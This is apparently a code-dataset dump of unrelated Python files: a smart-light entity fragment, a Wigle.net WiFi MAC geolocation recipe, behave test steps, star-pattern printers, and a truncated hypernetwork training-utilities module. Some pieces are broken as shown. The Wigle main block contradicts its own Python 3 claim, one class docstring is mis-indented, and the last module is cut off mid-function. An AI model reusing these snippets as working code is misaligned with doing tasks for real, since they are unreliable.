        return self.translate(self._brightness, 1, 100, 1, 255)
    @property
    def color_temp(self):
        """Return the CT color value in mired."""
        # Kelvin (2700..6500) -> mireds (500..140).
        return self.translate(self._color_temp, 2700, 6500, 500, 140)
    @property
    def is_on(self):
        """Return true if light is on."""
        return self._on
    @property
    def supported_features(self):
        # Mesh bulbs additionally support full RGB color.
        if self._device_type is DeviceTypes.MESH_LIGHT:
            return SUPPORT_BRIGHTNESS | SUPPORT_COLOR_TEMP | SUPPORT_COLOR
        return SUPPORT_BRIGHTNESS | SUPPORT_COLOR_TEMP
    def update(self):
        """Poll the bulb's state, unless a local command just ran.

        After turn_on/turn_off the cached state is already correct, so one
        polling cycle is skipped (via _just_updated) to avoid overwriting it
        with stale cloud data.
        """
        if not self._just_updated:
            try:
                device_info = self._client.get_info(self._device)
            except AccessTokenError:
                self._client.reauthenticate()
                device_info = self._client.get_info(self._device)
            for property_id, value in device_info:
                if property_id == PropertyIDs.BRIGHTNESS:
                    self._brightness = int(value)
                elif property_id == PropertyIDs.COLOR_TEMP:
                    try:
                        self._color_temp = int(value)
                    except ValueError:
                        # Fall back to warm white on a non-numeric report.
                        self._color_temp = 2700
                elif property_id == PropertyIDs.ON:
                    self._on = True if value == "1" else False
                elif property_id == PropertyIDs.AVAILABLE:
                    self._available = True if value == "1" else False
                elif self._device_type is DeviceTypes.MESH_LIGHT and property_id == PropertyIDs.COLOR:
                    self._color = value
        else:
            self._just_updated = False
| StarcoderdataPython |
73579 | <filename>recipes/Python/578637_Wigle_wifi/recipe-578637.py
from uuid import getnode
import re
import requests
class WigleAgent():
    """Geolocate a WiFi access point (BSSID/MAC) via the Wigle.net API.

    Modernized to Python 3: the original used `xrange` and sliced
    `hex(getnode())`, which dropped the last MAC octet on Python 3.
    """
    def __init__(self, username, password):
        # NOTE: these calls rebind self.agent / self.mac_address from bound
        # methods to a requests.Session / MAC string, respectively.
        self.agent(username, password)
        self.mac_address()

    def get_lat_lng(self, mac_address=None):
        """Return (lat, lng) for *mac_address*, defaulting to this host's MAC.

        Returns the string 'MAC location not known' when Wigle has no data.
        """
        if mac_address is None:
            mac_address = self.mac_address
        if '-' in mac_address:
            mac_address = mac_address.replace('-', ':')
        try:
            self.query_response = self.send_query(mac_address)
            response = self.parse_response()
        except IndexError:
            # Wigle returns an empty locationData list for unknown MACs.
            response = 'MAC location not known'
        return response

    def agent(self, username, password):
        """Create an authenticated requests session against wigle.net."""
        self.agent = requests.Session()
        self.agent.post('https://wigle.net/api/v1/jsonLogin',
                        data={'credential_0': username,
                              'credential_1': password,
                              'destination': '/https://wigle.net/'})

    def mac_address(self):
        """Store this host's MAC address as 'aa:bb:cc:dd:ee:ff'.

        BUGFIX: the original chunked hex(getnode()) into pairs and kept
        slice [1:6], yielding only 5 of the 6 octets (and missing leading
        zeros). Format the 48-bit node id as 12 hex digits explicitly.
        """
        mac = '{:012x}'.format(getnode())
        self.mac_address = ':'.join(mac[i:i + 2] for i in range(0, 12, 2))

    def send_query(self, mac_address):
        """POST the MAC to Wigle's jsonLocation endpoint; return parsed JSON."""
        response = self.agent.post(url='https://wigle.net/api/v1/jsonLocation',
                                   data={'netid': mac_address,
                                         'Query2': 'Query'})
        return response.json()

    def parse_response(self):
        """Extract (lat, lng) from the most recent query response."""
        lat = self.get_lat()
        lng = self.get_lng()
        return lat, lng

    def get_lat(self):
        resp_lat = self.query_response['result'][0]['locationData'][0]['latitude']
        return float(resp_lat)

    def get_lng(self):
        resp_lng = self.query_response['result'][0]['locationData'][0]['longitude']
        return float(resp_lng)
if __name__ == "__main__":
wa = WigleAgent('your-username', 'your-key')
print wa.get_lat_lng('00:1C:0E:42:79:43')
| StarcoderdataPython |
3290749 | <reponame>msabramo/ibehave
from behave import given, when, then
class BlackHole(object):
    """Inert marker object representing a single black hole in the scenario."""
    pass
@given('we have {number:d} black holes')
def given_blackholes(context, number):
    # Store `number` fresh BlackHole instances and reset the collision flag.
    context.response = tuple(BlackHole() for _ in range(number))
    context.collided = False
@given('a big L')
def given_big_l(context):
    # Flag consumed by the 'shockwaves' assertion step below.
    context.has_l = True
@when('the holes collide')
def when_they_collide(context):
    # Record the collision event on the scenario context.
    context.collided = True
@then('we detect shockwaves')
def then_detect_shockwaves(context):
    # Shockwaves require that "a big L" was given and at least two holes.
    # NOTE(review): context.collided is never checked here -- confirm intent.
    assert getattr(context, "has_l", False) is True
    assert len(context.response) > 1
1634497 | import sys
sys.setrecursionlimit(2 ** 8)
read = sys.stdin.readline
n = int(read())
# Create an empty grid; every cell starts as a blank space.
pattern = [[' '] * n for _ in range(n)]
# Recursion starts from the top-left corner: (0, 0, n).
# -- recursion function --
# Parameters: (x, y, cur_n), where cur_n is the current power-of-3 block size.
# Draws a Sierpinski-carpet-like star pattern (centre of each 3x3 sub-block
# stays empty).
def recursion(cur_x, cur_y, cur_n):
    # Base case: a 1x1 block is a single star.
    if cur_n == 1:
        pattern[cur_x][cur_y] = "*"
        return
    # Otherwise shrink the block size by a factor of 3 for the next level.
    cur_n //= 3
    # Recurse into the 3x3 grid of sub-blocks (i, j in 0..2), skipping the
    # centre sub-block (1, 1), which is left blank.
    # Each call: recursion(x + i * cur_n, y + j * cur_n, cur_n).
    for i in range(3):
        for j in range(3):
            if i == 1 and j == 1:
                continue
            else:
                recursion(cur_x + (i * cur_n), cur_y + (j * cur_n), cur_n)
# -- recursion function --
recursion(0, 0, n)
# Print the finished grid row by row.
for in_pattern in pattern:
    print(''.join(map(str, in_pattern)))
33368 | class Pattern_Twenty_Six:
'''Pattern twenty_six
***
* *
*
* ***
* *
* *
***
'''
    def __init__(self, strings='*'):
        # Coerce non-string input so the repetitions / f-strings below work.
        if not isinstance(strings, str):
            strings = str(strings)
        # Seven rows; each branch prints one row of the shape shown in the
        # class docstring, built from `strings`.
        for i in range(7):
            if i in [0, 6]:
                # top and bottom caps
                print(f' {strings * 3}')
            elif i in [1, 4, 5]:
                # left and right edges
                print(f'{strings} {strings}')
            elif i == 3:
                # middle row with the inner bar
                print(f'{strings} {strings * 3}')
            else:
                # row 2: left edge only
                print(strings)
if __name__ == '__main__':
    # Demo: print the pattern once with the default '*' character.
    Pattern_Twenty_Six()
| StarcoderdataPython |
97285 | <reponame>chrhenning/posterior_replay_cl<filename>probabilistic/prob_cifar/train_utils.py
#!/usr/bin/env python3
# Copyright 2020 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# @title :probabilistic/prob_cifar/train_utils.py
# @author :ch
# @contact :<EMAIL>
# @created :01/30/2020
# @version :1.0
# @python_version :3.6.9
"""
Training utilities
------------------
A collection of helper functions for training scripts of this subpackage.
"""
from argparse import Namespace
from argparse import Namespace
from warnings import warn

import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import seaborn as sns
import torch
from torch.nn import functional as F

from data.special.permuted_mnist import PermutedMNIST
from hnets.chunked_mlp_hnet import ChunkedHMLP
from hnets.hnet_helpers import init_conditional_embeddings
from hnets.hnet_perturbation_wrapper import HPerturbWrapper
from hnets.mlp_hnet import HMLP
from hnets.structured_hmlp_examples import resnet_chunking, wrn_chunking
from hnets.structured_mlp_hnet import StructuredHMLP
from probabilistic import GaussianBNNWrapper
from probabilistic import prob_utils as putils
from probabilistic.regression import train_utils as rtu
from probabilistic.prob_cifar import hpsearch_config_resnet_avb as hpresnetavb
from probabilistic.prob_cifar import hpsearch_config_resnet_avb_pf as \
    hpresnetavbpf
from probabilistic.prob_cifar import hpsearch_config_zenke_avb as hpzenkeavb
from probabilistic.prob_cifar import hpsearch_config_zenke_avb_pf as \
    hpzenkeavbpf
from probabilistic.prob_cifar import hpsearch_config_zenke_bbb as hpzenkebbb
from probabilistic.prob_cifar import hpsearch_config_resnet_bbb as hpresnetbbb
from probabilistic.prob_cifar import hpsearch_config_resnet_ewc as hpresnetewc
from probabilistic.prob_cifar import hpsearch_config_resnet_mt as hpresnetmt
from probabilistic.prob_cifar import hpsearch_config_resnet_ssge as hpresnetssge
from probabilistic.prob_cifar import hpsearch_config_resnet_ssge_pf as \
    hpresnetssgepf
from probabilistic.prob_gmm import hpsearch_config_gmm_bbb as hpgmmbbb
from probabilistic.prob_gmm import hpsearch_config_gmm_ewc as hpgmmewc
from probabilistic.prob_gmm import hpsearch_config_gmm_avb as hpgmmavb
from probabilistic.prob_gmm import hpsearch_config_gmm_avb_pf as hpgmmavbpf
# Needed by `setup_summary_dict` for the 'gmm_mt' experiment (was missing).
from probabilistic.prob_gmm import hpsearch_config_gmm_mt as hpgmmmt
from probabilistic.prob_gmm import hpsearch_config_gmm_ssge as hpgmmssge
from probabilistic.prob_gmm import hpsearch_config_gmm_ssge_pf as hpgmmssgepf
from probabilistic.prob_mnist import train_utils as pmutils
from probabilistic.prob_mnist import hpsearch_config_split_avb as hpsplitavb
from probabilistic.prob_mnist import hpsearch_config_split_avb_pf as \
    hpsplitavbpf
from probabilistic.prob_mnist import hpsearch_config_perm_avb as hppermavb
from probabilistic.prob_mnist import hpsearch_config_perm_avb_pf as \
    hppermavbpf
from probabilistic.prob_mnist import hpsearch_config_perm_bbb as hppermbbb
from probabilistic.prob_mnist import hpsearch_config_perm_ewc as hppermewc
from probabilistic.prob_mnist import hpsearch_config_perm_mt as hppermmt
from probabilistic.prob_mnist import hpsearch_config_split_bbb as hpsplitbbb
from probabilistic.prob_mnist import hpsearch_config_split_ewc as hpsplitewc
from probabilistic.prob_mnist import hpsearch_config_split_mt as hpsplitmt
from probabilistic.prob_mnist import hpsearch_config_split_ssge as \
    hpsplitssge
from probabilistic.prob_mnist import hpsearch_config_split_ssge_pf as \
    hpsplitssgepf
from utils import gan_helpers as gan
from utils import sim_utils as sutils
from utils import torch_utils as tutils
def generate_networks(config, shared, logger, data_handlers, device,
                      create_mnet=True, create_hnet=True, create_hhnet=True,
                      create_dis=True):
    """Create the networks required for training with implicit distributions.

    This function will create networks based on user configuration.

    This function also takes care of weight initialization.

    Args:
        config (argparse.Namespace): Command-line arguments.
        shared (argparse.Namespace): Miscellaneous data shared among training
            functions.
        logger: Console (and file) logger.
        data_handlers: List of data handlers, one for each task. Needed to
            extract the number of inputs/outputs of the main network. And to
            infer the number of tasks.
        device: Torch device.
        create_mnet (bool, optional): If ``False``, the user can force that no
            main network is generated.
        create_hnet (bool, optional): If ``False``, the user can force that no
            hypernet ``hnet`` is generated.

            Note:
                Even if ``True``, the ``hnet`` is only generated if the user
                configuration ``config`` requests it.
        create_hhnet (bool, optional): If ``False``, the user can force that no
            hyper-hypernet ``hhnet`` is generated.

            Note:
                Even if ``True``, the ``hhnet`` is only generated if the user
                configuration ``config`` requests it.
        create_dis (bool, optional): If ``False``, the user can force that no
            discriminator ``dis`` is generated.

            Note:
                Even if ``True``, the ``dis`` is only generated if the user
                configuration ``config`` requests it.

    Returns:
        (tuple): Tuple containing:

        - **mnet**: Main network instance.
        - **hnet** (optional): Hypernetwork instance. This return value is
          ``None`` if no hypernetwork should be constructed.
        - **hhnet** (optional): Hyper-hypernetwork instance. This return value
          is ``None`` if no hyper-hypernetwork should be constructed.
        - **dis** (optional): Discriminator instance. This return value is
          ``None`` if no discriminator should be constructed.
    """
    num_tasks = len(data_handlers)
    if hasattr(config, 'cl_scenario'):
        # CL2 (domain incremental) uses a single shared head.
        num_heads = 1 if config.cl_scenario == 2 else num_tasks
    else:
        assert hasattr(config, 'multi_head')
        num_heads = num_tasks if config.multi_head else 1

    # Sanity check! All tasks must share the same input (and output)
    # dimensionality, since one main network architecture serves all of them.
    for i in range(1, num_tasks):
        assert np.prod(data_handlers[i].in_shape) == \
            np.prod(data_handlers[0].in_shape)
        if data_handlers[0].classification:
            assert data_handlers[i].num_classes == data_handlers[0].num_classes
        else:
            assert np.prod(data_handlers[i].out_shape) == \
                np.prod(data_handlers[0].out_shape)

    # Parse user "wishes".
    use_hnet = False
    use_hhnet = False
    use_dis = False
    no_mnet_weights = False
    if hasattr(config, 'mnet_only'):
        use_hnet = not config.mnet_only
        use_hhnet = not config.mnet_only and not shared.prior_focused and \
            not config.no_hhnet
        # Note, without the hypernet, there is no weight distribution and
        # therefore no discriminator needed.
        use_dis = use_hnet and not config.no_dis
        no_mnet_weights = not config.mnet_only
    if hasattr(config, 'distill_iter'):
        # Note, if distillation is used, the hnet is first trained independent
        # of a hyper-hypernetwork, which is why it needs its own weights.
        no_hnet_weights = use_hhnet and config.distill_iter == -1
    else:
        no_hnet_weights = use_hhnet

    ####################
    ### Main network ###
    ####################
    if 'gmm' in shared.experiment_type or \
            'regression' in shared.experiment_type:
        mnet_type = 'mlp'
        in_shape = data_handlers[0].in_shape
    elif 'mnist' in shared.experiment_type:
        if hasattr(config, 'net_type'):
            logger.debug('Main network will be of type: %s.' % config.net_type)
            mnet_type = config.net_type
        else:
            logger.debug('Main network will be an MLP.')
            mnet_type = 'mlp'

        assert len(data_handlers[0].in_shape) == 3 # MNIST
        in_shape = data_handlers[0].in_shape
        # Note, that padding is currently only applied when transforming the
        # image to a torch tensor.
        if isinstance(data_handlers[0], PermutedMNIST):
            assert len(data_handlers[0].torch_in_shape) == 3 # MNIST
            in_shape = data_handlers[0].torch_in_shape
    else:
        assert 'cifar' in shared.experiment_type
        in_shape = [32, 32, 3]

        if 'zenke' in shared.experiment_type:
            assert not hasattr(config, 'net_type')
            mnet_type = 'zenke'
        else:
            assert 'resnet' in shared.experiment_type
            mnet_type = config.net_type

    if mnet_type == 'mlp':
        # MLPs expect flattened inputs.
        if len(in_shape) > 1:
            n_x = np.prod(in_shape)
            in_shape = [n_x]
    else:
        assert len(in_shape) == 3
        assert mnet_type in ['lenet', 'resnet', 'wrn', 'iresnet', 'zenke']

    if data_handlers[0].classification:
        out_shape = [data_handlers[0].num_classes * num_heads]
    else:
        assert len(data_handlers[0].out_shape) == 1
        out_shape = [data_handlers[0].out_shape[0] * num_heads]

    if not create_mnet:
        # FIXME We would need to allow the passing of old `mnet`s.
        raise NotImplementedError('This function doesn\'t support yet to ' +
                                  'construct networks without constructing ' +
                                  'a main network first.')
    logger.info('Creating main network ...')
    mnet_kwargs = {}
    if mnet_type == 'iresnet':
        mnet_kwargs['cutout_mod'] = True
    mnet = sutils.get_mnet_model(config, mnet_type, in_shape, out_shape,
                                 device, no_weights=no_mnet_weights,
                                 **mnet_kwargs)

    # Initialize main net weights, if any.
    assert not hasattr(config, 'custom_network_init')
    if hasattr(config, 'normal_init'):
        mnet.custom_init(normal_init=config.normal_init,
                         normal_std=config.std_normal_init, zero_bias=True)
    else:
        mnet.custom_init(zero_bias=True)

    #####################
    ### Discriminator ###
    #####################
    dis = None
    if use_dis and create_dis:
        logger.info('Creating discriminator ...')
        # With batch statistics, means and stds are appended to the
        # discriminator input, doubling its size.
        if config.use_batchstats:
            in_shape = [mnet.num_params * 2]
        else:
            in_shape = [mnet.num_params]

        dis = sutils.get_mnet_model(config, config.dis_net_type, in_shape, [1],
                                    device, cprefix='dis_', no_weights=False)
        dis.custom_init(normal_init=config.normal_init,
                        normal_std=config.std_normal_init, zero_bias=True)

    #####################
    ### Hypernetwork  ###
    #####################
    def _hyperfan_init(net, mnet, cond_var, uncond_var):
        # Apply the variance-preserving hyperfan initialization appropriate
        # for the concrete hypernetwork type.
        if isinstance(net, HMLP):
            net.apply_hyperfan_init(method='in', use_xavier=False,
                                    uncond_var=uncond_var, cond_var=cond_var,
                                    mnet=mnet)
        elif isinstance(net, ChunkedHMLP):
            net.apply_chunked_hyperfan_init(method='in', use_xavier=False,
                uncond_var=uncond_var, cond_var=cond_var, mnet=mnet, eps=1e-5,
                cemb_normal_init=False)
        elif isinstance(net, StructuredHMLP):
            # FIXME We should adapt `uncond_var`, as chunk embeddings are
            # additionally inputted as unconditional inputs.
            # FIXME We should provide further instructions on what individual
            # chunks represent (e.g., batchnorm scales and shifts should be
            # initialized differently).
            for int_hnet in net.internal_hnets:
                # BUGFIX: the init has to be applied to each internal
                # hypernetwork. The original code called
                # `net.apply_hyperfan_init` here, leaving `int_hnet` unused.
                int_hnet.apply_hyperfan_init(method='in', use_xavier=False,
                    uncond_var=uncond_var, cond_var=cond_var, mnet=None)
        else:
            raise NotImplementedError('No hyperfan-init implemented for ' +
                                      'hypernetwork of type %s.' % type(net))

    hnet = None
    if use_hnet and create_hnet:
        logger.info('Creating hypernetwork ...')

        # For now, we either produce all or no weights with the hypernet.
        # Note, it can be that the mnet was produced with internal weights.
        assert mnet.hyper_shapes_learned is None or \
            len(mnet.param_shapes) == len(mnet.hyper_shapes_learned)

        chunk_shapes = None
        num_per_chunk = None
        assembly_fct = None
        if config.imp_hnet_type == 'structured_hmlp':
            if mnet_type == 'resnet':
                chunk_shapes, num_per_chunk, assembly_fct = \
                    resnet_chunking(mnet,
                        gcd_chunking=config.imp_shmlp_gcd_chunking)
            elif mnet_type == 'wrn':
                chunk_shapes, num_per_chunk, assembly_fct = \
                    wrn_chunking(mnet,
                        gcd_chunking=config.imp_shmlp_gcd_chunking,
                        ignore_bn_weights=False, ignore_out_weights=False)
            else:
                raise NotImplementedError('"structured_hmlp" not implemented ' +
                                          'for network of type %s.' % mnet_type)

        # The hypernet is an implicit distribution, that only receives noise
        # as input, which are unconditional inputs.
        hnet = sutils.get_hypernet(config, device, config.imp_hnet_type,
            mnet.param_shapes, 0, cprefix='imp_',
            no_uncond_weights=no_hnet_weights, no_cond_weights=True,
            uncond_in_size=config.latent_dim, shmlp_chunk_shapes=chunk_shapes,
            shmlp_num_per_chunk=num_per_chunk, shmlp_assembly_fct=assembly_fct)
        #if isinstance(hnet, StructuredHMLP):
        #    print(num_per_chunk)
        #    for ii, int_hnet in enumerate(hnet.internal_hnets):
        #        print('   Internal hnet %d with %d outputs.' % \
        #              (ii, int_hnet.num_outputs))

        ### Initialize hypernetwork.
        if not no_hnet_weights:
            if not config.hyper_fan_init:
                rtu.apply_custom_hnet_init(config, logger, hnet)
            else:
                # `cond_var=-1` since the hnet receives no conditional inputs.
                _hyperfan_init(hnet, mnet, -1, config.latent_std**2)

        ### Apply noise trick if requested by user.
        if config.full_support_perturbation != -1:
            hnet = HPerturbWrapper(hnet, hnet_uncond_in_size=config.latent_dim,
                                   sigma_noise=config.full_support_perturbation)
            shared.noise_dim = hnet.num_outputs
        else:
            shared.noise_dim = config.latent_dim

    ##########################
    ### Hyper-hypernetwork ###
    ##########################
    hhnet = None
    if use_hhnet and create_hhnet:
        if not create_hnet:
            # FIXME We require an existing hnet to do this.
            raise NotImplementedError('This function doesn\'t allow yet the ' +
                                      'creation of a hyper-hypernet without ' +
                                      'first creating a hypernetwork.')
        logger.info('Creating hyper-hypernetwork ...')
        assert hnet is not None
        assert len(hnet.unconditional_param_shapes) == len(hnet.param_shapes)
        hhnet = sutils.get_hypernet(config, device, config.hh_hnet_type,
                                    hnet.unconditional_param_shapes, num_tasks,
                                    cprefix='hh_')

        ### Initialize hypernetwork.
        if not config.hyper_fan_init:
            rtu.apply_custom_hnet_init(config, logger, hhnet)
        else:
            # Note, hyperfan-init doesn't take care of task-embedding
            # intialization.
            init_conditional_embeddings(hhnet,
                                        normal_std=config.std_normal_temb)
            # `uncond_var=-1` since the hhnet receives no unconditional inputs.
            _hyperfan_init(hhnet, hnet, config.std_normal_temb**2, -1)

    return mnet, hnet, hhnet, dis
def setup_summary_dict(config, shared, experiment, mnet, hnet=None,
                       hhnet=None, dis=None):
    """Setup the summary dictionary that is written to the performance
    summary file (in the result folder).

    This method adds the keyword "summary" to ``shared``.

    Args:
        config (argparse.Namespace): Command-line arguments.
        shared (argparse.Namespace): Miscellaneous data shared among training
            functions (summary dict will be added).
        experiment: Type of experiment. See argument `experiment` of method
            :func:`probabilistic.prob_cifar.train_avb.run`.
        mnet: Main network.
        hnet (optional): Implicit Hypernetwork.
        hhnet (optional): Hyper-Hypernetwork.
        dis (optional): Discriminator.

    Raises:
        ValueError: If a summary keyword declared by the hpsearch config is
            unknown to this function (implementation must have changed).
    """
    # Maps each experiment type onto the hpsearch config module that declares
    # the summary keywords to be written.
    # NOTE(review): 'perm_mnist_ssge' maps onto `hpsplitssgepf` (and not a
    # dedicated "perm" config) exactly as in the original `if`/`elif` chain --
    # verify this reuse is intentional.
    summary_key_modules = {
        'gmm_bbb': hpgmmbbb,
        'split_bbb': hpsplitbbb,
        'perm_bbb': hppermbbb,
        'cifar_zenke_bbb': hpzenkebbb,
        'cifar_resnet_bbb': hpresnetbbb,
        'gmm_avb': hpgmmavb,
        'gmm_avb_pf': hpgmmavbpf,
        'split_mnist_avb': hpsplitavb,
        'split_mnist_avb_pf': hpsplitavbpf,
        'perm_mnist_avb': hppermavb,
        'perm_mnist_avb_pf': hppermavbpf,
        'cifar_zenke_avb': hpzenkeavb,
        'cifar_zenke_avb_pf': hpzenkeavbpf,
        'cifar_resnet_avb': hpresnetavb,
        'cifar_resnet_avb_pf': hpresnetavbpf,
        'gmm_ssge': hpgmmssge,
        'gmm_ssge_pf': hpgmmssgepf,
        'split_mnist_ssge': hpsplitssge,
        'split_mnist_ssge_pf': hpsplitssgepf,
        'perm_mnist_ssge': hpsplitssgepf,
        'perm_mnist_ssge_pf': hpsplitssgepf,
        'cifar_resnet_ssge': hpresnetssge,
        'cifar_resnet_ssge_pf': hpresnetssgepf,
        'gmm_ewc': hpgmmewc,
        'split_mnist_ewc': hpsplitewc,
        'perm_mnist_ewc': hppermewc,
        'cifar_resnet_ewc': hpresnetewc,
        'gmm_mt': hpgmmmt,
        'split_mnist_mt': hpsplitmt,
        'perm_mnist_mt': hppermmt,
        'cifar_resnet_mt': hpresnetmt,
    }
    assert experiment in summary_key_modules.keys()

    summary = dict()

    # Parameter counts and their ratios relative to the main network. A value
    # of -1 denotes "network not present".
    mnum = mnet.num_params
    hnum = hnet.num_params if hnet is not None else -1
    hhnum = hhnet.num_params if hhnet is not None else -1
    dnum = dis.num_params if dis is not None else -1
    hm_ratio = hnum / mnum if hnet is not None else -1
    hhm_ratio = hhnum / mnum if hhnet is not None else -1
    dm_ratio = dnum / mnum if dis is not None else -1

    summary_keys = summary_key_modules[experiment]._SUMMARY_KEYWORDS

    # Keywords that hold one (per-task) accuracy value per task.
    per_task_keys = ['acc_task_given', 'acc_task_given_during',
                     'acc_task_inferred_ent', 'acc_task_inferred_ent_during',
                     'acc_dis']
    # Keywords that hold a single scalar accuracy.
    scalar_acc_keys = ['acc_avg_final', 'acc_avg_during',
                       'acc_avg_task_given', 'acc_avg_task_given_during',
                       'acc_avg_task_inferred_ent',
                       'acc_avg_task_inferred_ent_during',
                       'avg_task_inference_acc_ent',
                       'acc_avg_task_inferred_conf',
                       'avg_task_inference_acc_conf',
                       'acc_avg_task_inferred_agree',
                       'avg_task_inference_acc_agree',
                       'acc_avg_dis']
    # Keywords with a fixed value determined by the networks above.
    fixed_value_keys = {
        'num_weights_main': mnum,
        'num_weights_hyper': hnum,
        'num_weights_hyper_hyper': hhnum,
        'num_weights_dis': dnum,
        'num_weights_hm_ratio': hm_ratio,
        'num_weights_hhm_ratio': hhm_ratio,
        'num_weights_dm_ratio': dm_ratio,
        'finished': 0,
    }

    for k in summary_keys:
        if k in per_task_keys:
            summary[k] = [-1] * config.num_tasks
        elif k in scalar_acc_keys:
            summary[k] = -1
        elif k in fixed_value_keys:
            summary[k] = fixed_value_keys[k]
        else:
            # Implementation must have changed if this exception is
            # raised.
            raise ValueError('Summary argument %s unknown!' % k)

    shared.summary = summary
def set_train_mode(training, mnet, hnet, hhnet, dis):
    """Switch all given networks between training and evaluation mode.

    Networks passed as ``None`` are silently skipped; the mode is only set
    on the instances that were actually provided.

    Args:
        training (bool): If ``True``, training mode will be activated.
            Otherwise, evaluation mode is activated.
        (....): The remaining arguments refer to network instances.
    """
    for candidate in (mnet, hnet, hhnet, dis):
        if candidate is None:
            continue
        if training:
            candidate.train()
        else:
            candidate.eval()
def compute_acc(task_id, data, mnet, hnet, hhnet, device, config, shared,
                split_type='test', return_dataset=False, return_entropies=False,
                return_confidence=False, return_agreement=False,
                return_pred_labels=False, return_labels=False,
                return_samples=False, deterministic_sampling=False,
                in_samples=None, out_samples=None, num_w_samples=None,
                w_samples=None):
    """Compute the accuracy over a specified dataset split.

    Note, this function does not explicitly execute the code within a
    ``torch.no_grad()`` context. This needs to be handled from the outside if
    desired.

    Note, this function serves the same purpose as function
    :func:`probabilistic.prob_mnist.train_utils.compute_acc`.

    The ``task_id`` is used only to select the task embedding (if ``hhnet``
    is given) and the correct output units depending on the CL scenario.

    Args:
        (....): See docstring of function
            :func:`probabilistic.prob_mnist.train_utils.compute_acc`.
        return_samples: If ``True``, the attribute ``samples`` will be
            added to the ``return_vals`` Namespace (see return values). This
            field will contain all weight samples that have been drawn from
            the hypernetwork ``hnet``. If ``hnet`` is not provided,
            this field will be ``None``. The field will be filled with a
            numpy array.

    Returns:
        (tuple): Tuple containing:

        - **accuracy**: Overall accuracy on dataset split.
        - **return_vals**: A namespace object that contains several attributes,
          depending on the arguments passed. It will allways contain the
          following attribute, denoting the current weights of the implicit
          distribution.

          - ``theta``: The current output of the ``hhnet`` for ``task_id``.
            If no ``hhnet`` is provided but an ``hnet`` is given,
            then its weights ``theta`` will be provided. It will be
            ``None`` if only a main network ``mnet`` is provided.
    """
    # FIXME The code is almost a perfect copy from the original function.
    assert in_samples is not None or split_type in ['test', 'val', 'train']
    assert out_samples is None or in_samples is not None

    generator = None
    if deterministic_sampling:
        generator = torch.Generator()#device=device)
        # Note, PyTorch recommends using large random seeds:
        # https://tinyurl.com/yx7fwrry
        generator.manual_seed(2147483647)

    # NOTE(review): `Namespace` (presumably ``argparse.Namespace``) is not
    # among this module's visible imports -- verify it is imported at the top
    # of the file.
    return_vals = Namespace()

    allowed_outputs = pmutils.out_units_of_task(config, data, task_id,
                                                shared.num_trained)

    # Softmax temperature for this task; 1 unless temperature calibration
    # has been performed.
    ST = shared.softmax_temp[task_id]
    if not config.calibrate_temp:
        assert ST == 1.

    # Select evaluation inputs/targets: either user-provided samples or the
    # requested dataset split (falling back to "test" if no val set exists).
    if in_samples is not None:
        X = in_samples
        T = out_samples
    elif split_type == 'train':
        X = data.get_train_inputs()
        T = data.get_train_outputs()
    elif split_type == 'test' or data.num_val_samples == 0:
        X = data.get_test_inputs()
        T = data.get_test_outputs()
    else:
        X = data.get_val_inputs()
        T = data.get_val_outputs()

    num_samples = X.shape[0]

    if T is not None:
        # Bring targets into the softmax layout matching the CL scenario
        # (e.g., absolute labels for growing CL3 heads).
        T = pmutils.fit_targets_to_softmax(config, shared, device, data,
                                           task_id, T)

    if return_dataset:
        return_vals.inputs = X
        return_vals.targets = T

    labels = None
    if T is not None:
        labels = np.argmax(T, axis=1)
    if return_labels:
        return_vals.labels = labels

    X = data.input_to_torch_tensor(X, device)
    #if T is not None:
    #    T = data.output_to_torch_tensor(T, device)

    # Determine the weights `theta` of the implicit distribution (and expose
    # them to the caller via `return_vals.theta`).
    hnet_theta = None
    return_vals.theta = None
    if hhnet is not None:
        assert hnet is not None
        hnet_theta = hhnet.forward(cond_id=task_id)
        return_vals.theta = hnet_theta
    elif hnet is not None:
        return_vals.theta = hnet.unconditional_params
    # There is no weight sampling without an implicit hypernetwork.

    # Determine how many weight samples (models) to average over.
    if w_samples is not None:
        num_w_samples = len(w_samples)
    elif num_w_samples is None:
        num_w_samples = 1 if hnet is None else config.val_sample_size
    else:
        if hnet is None and num_w_samples > 1:
            warn('Cannot draw multiple weight samples for deterministic ' +
                 'network')
            num_w_samples = 1

    # Width of the softmax output depends on the CL scenario and head setup.
    if hasattr(config, 'non_growing_sf_cl3') and config.cl_scenario == 3 \
            and config.non_growing_sf_cl3:
        softmax_width = config.num_tasks * data.num_classes
    elif config.cl_scenario == 3 and not config.split_head_cl3:
        softmax_width = len(allowed_outputs)
    else:
        softmax_width = data.num_classes

    softmax_outputs = np.empty((num_w_samples, X.shape[0], softmax_width))

    if return_samples:
        return_vals.samples = None

    # FIXME Note, that a continually learned hypernet (whose weights come from a
    # hyper-hypernet) would in principle also require correct argument passing,
    # e.g., to choose the correct set of batch statistics.
    kwargs = pmutils.mnet_kwargs(config, task_id, mnet)

    # Outer loop: one model (weight sample) per iteration.
    for j in range(num_w_samples):
        weights = None
        if w_samples is not None:
            weights = w_samples[j]
        elif hnet is not None:
            z = torch.normal(torch.zeros(1, shared.noise_dim),
                             config.latent_std, generator=generator).to(device)
            weights = hnet.forward(uncond_input=z, weights=hnet_theta)

        if weights is not None and return_samples:
            if j == 0:
                return_vals.samples = np.empty((num_w_samples,
                                                hnet.num_outputs))
            return_vals.samples[j, :] = torch.cat([p.detach().flatten() \
                for p in weights]).cpu().numpy()

        # Inner loop: process the dataset in mini-batches of size
        # `val_batch_size` (last batch may be smaller).
        curr_bs = config.val_batch_size
        n_processed = 0

        while n_processed < num_samples:
            if n_processed + curr_bs > num_samples:
                curr_bs = num_samples - n_processed
            n_processed += curr_bs

            sind = n_processed - curr_bs
            eind = n_processed

            Y = mnet.forward(X[sind:eind, :], weights=weights, **kwargs)
            if allowed_outputs is not None:
                Y = Y[:, allowed_outputs]

            softmax_outputs[j, sind:eind, :] = F.softmax(Y / ST, dim=1). \
                detach().cpu().numpy()

    # Predictive distribution per sample.
    pred_dists = softmax_outputs.mean(axis=0)

    pred_labels = np.argmax(pred_dists, axis=1)
    # Note, that for CL3 (without split heads) `labels` are already absolute,
    # not relative to the head (see post-processing of targets `T` above).
    if labels is not None:
